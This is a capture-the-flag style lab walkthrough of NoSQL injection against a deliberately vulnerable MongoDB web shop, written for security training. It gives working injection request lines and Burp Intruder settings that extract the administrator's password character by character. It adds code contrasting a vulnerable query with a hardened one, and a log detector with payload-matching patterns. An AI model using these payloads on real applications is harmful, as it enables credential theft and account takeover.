Lab: Exploiting NoSQL injection to extract data
Intro
The difficulty level of this exercise is PRACTITIONER and the goal is to log into the application as an administrator. The database backend is MongoDB.
To solve this exercise, we need Burp Suite, either Community or Professional Edition.
Walkthrough
After starting the exercise, the shop should look like the screenshot. However, the products in the shop may differ, as the Web Security Academy exercises are regenerated regularly. This has no influence on the solution.
At the top left, there is a link called “My account”.

Click on it and log in with the user name "wiener" and the password "peter".

After logging in, you should be able to access the account.

We now switch to Burp Suite and open the Burp Proxy. In Burp Proxy, we open the "HTTP history" tab and search for the GET request to the endpoint /user/lookup?user=wiener.

The HTTP history shows all requests that have been run through the Burp Proxy so far. We now want to send the request to the Burp Repeater. To do this, we move the mouse over the request and right-click. A context menu appears, in which we select the option “Send to Repeater”.

Now we open the Burp Repeater and take a closer look at the request. The most interesting part for us is the first line of the request. Here we insert a single apostrophe (') at the end of the user name "wiener". The request line should now look like this:
GET /user/lookup?user=wiener' HTTP/2
When this request is sent, we receive an HTTP/2 200 OK response with the following error message:
There was an error getting user details

Based on this error message, we now know that the user input is not sanitized correctly before it reaches the query. We now insert a syntactically valid JavaScript expression to test whether this also has an effect on the response. To do this, we insert a plus sign (string concatenation) and end the expression with another single apostrophe. The request should now look like this:
GET /user/lookup?user=wiener'+' HTTP/2
Before we can send this request, we first have to URL-encode it. To do this, select '+' and press CTRL+U in the Burp Repeater.
GET /user/lookup?user=wiener'%2b' HTTP/2
Now the request can be sent and you will receive an HTTP/2 200 OK.

We now want to test whether the response can also be influenced by inserting Boolean conditions. To do this, we insert a condition that evaluates to false. The first line of the request then looks like this:
GET /user/lookup?user=wiener' && '1'=='2 HTTP/2
This expression must also be URL-encoded again with CTRL+U.
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'2 HTTP/2
In response we receive the message:
Could not find user

Now we want to send a condition that evaluates to true. To do this, we change our expression wiener' && '1'=='2 to wiener' && '1'=='1. After we have URL-encoded it with the key combination CTRL+U, the first line of our request looks like this:
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'1 HTTP/2
When we send this request, we receive an HTTP/2 200 OK response with the data of the user "wiener".
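To make clear why the true and false conditions change the response, here is an added example (not code from the lab or from PortSwigger; the lab's server code is not shown, so the vulnerable shape is an assumption) of how such a lookup filter is typically built when it is vulnerable, beside a hardened form, with the $where evaluation simulated in-process on constructed documents:

```javascript
// Added example: vulnerable vs. hardened construction of the MongoDB filter
// behind a /user/lookup?user=... endpoint. The lab's real server code is not
// shown; the vulnerable shape below is an assumption that reproduces the
// behaviour observed in the walkthrough.

// VULNERABLE: the raw parameter is interpolated into a $where JavaScript
// string, so quotes and operators in the input become part of the query.
function buildLookupQueryVulnerable(user) {
  return { $where: `this.username == '${user}'` };
}

// HARDENED: enforce the expected type and an allow-list of characters, then
// use a plain equality filter; the value is treated as data, never as code.
const USERNAME_RE = /^[A-Za-z0-9_.-]{1,32}$/;

function buildLookupQuerySafe(user) {
  if (typeof user !== 'string' || !USERNAME_RE.test(user)) {
    throw new Error('invalid username parameter');
  }
  return { username: user };
}

// Simulate how the database evaluates a $where string against one document
// (MongoDB runs it as JavaScript with `this` bound to the document). A syntax
// error corresponds to the lab's "There was an error getting user details".
function whereMatches(query, doc) {
  return Boolean(new Function(`return (${query.$where});`).call(doc));
}

// Constructed sample documents (the admin password is the one the lab reveals).
const DOCS = [
  { username: 'wiener', password: 'peter' },
  { username: 'administrator', password: 'grgyyjpw' },
];

// Returns the usernames the vulnerable query matches for a given raw (already
// URL-decoded) `user` value, or 'error' when the injected JS does not parse.
function vulnerableLookup(user) {
  const query = buildLookupQueryVulnerable(user);
  try {
    return DOCS.filter((d) => whereMatches(query, d)).map((d) => d.username);
  } catch (e) {
    return 'error';
  }
}
```

The same inputs that change the vulnerable result either match literally or are rejected up front by buildLookupQuerySafe.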

This shows us that we can trigger different reactions for true and false conditions. Now we want to find out the length of the administrator password. To do this, we change the value of the user parameter as follows:
administrator' && this.password.length < 30 || 'a'=='b
This expression is used to test whether the administrator password is shorter than 30 characters. Before the request is sent, it must be URL-encoded with CTRL+U. The first line of the request then looks like this:
GET /user/lookup?user=administrator'+%26%26+this.password.length+<+30+||+'a'%3d%3d'b HTTP/2
In response, we receive an HTTP/2 200 OK with the administrator's information. This means that the condition is fulfilled, as the password is less than 30 characters long.

We can now try out different password lengths. If we set the length in the condition to 8 (this.password.length < 8), we receive the message:
Could not find user
The condition "< 8" is not fulfilled, while larger bounds are, so it can be concluded that the administrator password is 8 characters long.

This request is now sent to the Burp Intruder. To do this, move the mouse over the request and click the right mouse button. A context menu appears in which you select "Send to Intruder".

We now switch to the Burp Intruder and adjust our request. The value of the user parameter should now look like this:
administrator' && this.password[0]=='a
First, we select "Cluster bomb attack" from the drop-down menu.

Now we need to define which parameters are to be changed. To do this, we select the 0 in this.password[0] and click on the "Add §" button.

We do the same with the a in this.password[0]=='a. The first line of the request should now look like this:
GET /user/lookup?user=administrator' && this.password[§0§]=='§a§ HTTP/2
In the Payloads section, we can now configure the two positions we have just defined. Payload 1 is the 0 and Payload 2 is the a. For Payload 1, the Payload position should be 1.

"Numbers" must be selected in the Payload type drop-down field.

In the Payload configuration section, "0" must be entered under From and "7" under To. The rest remains unchanged.

For Payload 2, the value "2" must be entered under Payload position. "Simple list" must be selected in the Payload type drop-down list (this is the default setting). For Payload configuration, we now add the lower case letters from a-z. In Burp Professional, a predefined list can be used here.

Before the request can be sent, we have to URL-encode our expression with CTRL+U. The first line of the request now looks like this:
GET /user/lookup?user=administrator'+%26%26+this.password[§0§]%3d%3d'§a§ HTTP/2
Now click on the "Start attack" button. In the Community Edition of Burp Suite, this attack may take a little longer, as there are speed restrictions for the Burp Intruder.
After completing the attack, we sort our results by clicking on "Payload 1" and then double-clicking on "Length".

The password here is grgyyjpw. We now log in to the application with the user administrator and the password grgyyjpw.
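From the defender's side, the length probing and the character-by-character Intruder run above leave a very recognizable trail in web-server logs. The following added example (not part of the lab or PortSwigger's material) decodes the user parameter of constructed access-log lines in the encoding Burp produced above and flags the indicators; the log format (client, method, path, status) is an assumption:

```javascript
// Added example: flag NoSQL-injection probes like the ones in this walkthrough
// in constructed web-server access-log lines. The line format
// "<client> <method> <path> <status>" is an assumption, not the lab's real log.

// Decode a query-string value the way a server does: '+' is a space, then
// percent-decoding. Returns null when the encoding is malformed.
function decodeParam(value) {
  try {
    return decodeURIComponent(value.replace(/\+/g, ' '));
  } catch (e) {
    return null;
  }
}

// Indicators taken from the payloads shown above: a quote followed by a JS
// operator, access to document fields via `this`, and a character-index probe.
const INDICATORS = [
  { name: 'quote-operator', re: /'\s*(&&|\|\||==)/ },
  { name: 'this-field', re: /\bthis\.[A-Za-z_]+/ },
  { name: 'char-probe', re: /\.password\[\d+\]\s*==/ },
];

// Parses one log line for the /user/lookup endpoint and returns the client
// plus the matching indicator names; lines for other paths return null.
function inspectLine(line) {
  const m = /^(\S+) (\S+) \/user\/lookup\?user=(\S*) (\d{3})$/.exec(line);
  if (!m) return null;
  const decoded = decodeParam(m[3]);
  const indicators = decoded === null
    ? ['malformed-encoding']
    : INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
  return { client: m[1], indicators };
}

// Clients with at least `threshold` char-probe requests are candidates for a
// character-by-character extraction run such as the Intruder attack above.
function findExtractionClients(lines, threshold) {
  const counts = new Map();
  for (const line of lines) {
    const r = inspectLine(line);
    if (r && r.indicators.includes('char-probe')) {
      counts.set(r.client, (counts.get(r.client) || 0) + 1);
    }
  }
  return [...counts].filter(([, n]) => n >= threshold).map(([c]) => c);
}

// Constructed sample log (payloads are the ones from this walkthrough).
const SAMPLE_LOG = [
  '203.0.113.5 GET /user/lookup?user=wiener 200',
  "203.0.113.5 GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'1 200",
  "203.0.113.5 GET /user/lookup?user=administrator'+%26%26+this.password[0]%3d%3d'a 200",
  "203.0.113.5 GET /user/lookup?user=administrator'+%26%26+this.password[1]%3d%3d'r 200",
  '198.51.100.7 GET /user/lookup?user=carlos 200',
];
```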
